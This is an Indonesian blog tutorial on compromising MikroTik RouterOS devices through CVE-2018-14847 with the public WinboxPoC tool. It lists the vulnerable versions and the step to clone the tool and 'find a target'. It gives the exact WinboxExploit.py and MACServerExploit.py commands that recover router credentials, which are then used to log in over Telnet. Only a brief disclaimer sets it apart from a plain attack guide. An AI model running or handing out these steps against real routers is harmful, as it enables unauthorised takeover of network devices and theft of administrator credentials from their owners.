Cara Hacking Mikrotik Dengan WinboxPoC (Github)
Cara Hacking Mikrotik Dengan WinboxPoC (Github).
Hallo sob, kembali lagi di Defnilay - Blog pada artikel kali ini gua bakal membagikan tutorial "Cara Hacking Mikrotik Dengan WinboxPoC (Github)". Simak baik-baik sob!
Perlu
diketahui ini adalah bug (CVE-2018-14847) yang memungkinkan remote
attacker untuk melakukan bypass proses otentikasi dan membaca file,
dengan cara memodifikasi permintaan (Request) untuk mengubah 1 (satu)
byte yang terkait dengan Session ID.
Vulnerability untuk versi Mikrotik RouterOs
[ + ] Longterm: 6.30.1 - 6.40.7
[ + ] Stable: 6.29 - 6.42
[ + ] Beta: 6.29rc1 - 6.43rc3
Requirements
[ + ] Python 3+
Perlu
diingat bahwa artikel ini hanya sekedar untuk pembelajarann semua
percobaan dilakukan pada properti sendiri.saya tidak bertanggung jawab
atas perbuatan yang anda lakukan
Langsung saja ke tutorial nya
1. Clone tools WinboxPoc https://github.com/BasuCert/WinboxPoC.git
2. Cari target ( dalam kali ini saya lakukan pada properti milik sendiri)
3. Untuk menggunakan-nya
Untuk IP Address
$ python3 WinboxExploit.py <IP-ADDRESS> [PORT]
IP-ADDRESS : required
PORT : optional
contoh
$python3 WinboxExploit.py 192.168.1.1 8291
Untuk MacAddress
$python3 MACServerExploit.py <MAC-ADDRESS>
MAC_ADDRESS : required
contoh
$python3 MACServerExploit.py aa:bb:cc:dd:ee:ff
SS Hasil
Langsung kita coba loginkan dengan menggunakan Telnet
Masukan Username dan Password yang berhasil kita dapatkan
Dan Hasilnya
Akhir Kata
Sekian artikel kali ini tentang "Cara Hacking Mikrotik Dengan WinboxPoC (Github)" Semoga bermanfaat dan sampai jumpa di artikel selanjutnya!